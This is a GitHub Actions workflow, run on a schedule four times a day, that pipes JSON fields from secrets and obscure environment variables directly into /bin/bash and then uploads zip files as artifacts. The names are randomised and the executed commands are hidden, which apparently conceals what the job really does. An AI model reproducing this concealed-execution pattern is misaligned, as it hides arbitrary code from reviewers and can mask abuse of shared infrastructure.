name: dilikongbai
on:
  workflow_dispatch:

  schedule:
    - cron: '31 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dilikongbai
        env:
          imyw28: ${{ secrets.imyw28 }}
        run: |
          printf '%s' "$imyw28" | jq -r .muj49 | /bin/bash
          printf '%s' "$tflrj13914" | jq -r .vuzxe91 | /bin/bash
          echo $novhr81573 | jq -r .gumok56613 | /bin/bash
          printf '%s' "$qtw69" | jq -r .nsde63929 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 7NJuFpLF
          path: "*.zip"
          retention-days: 1
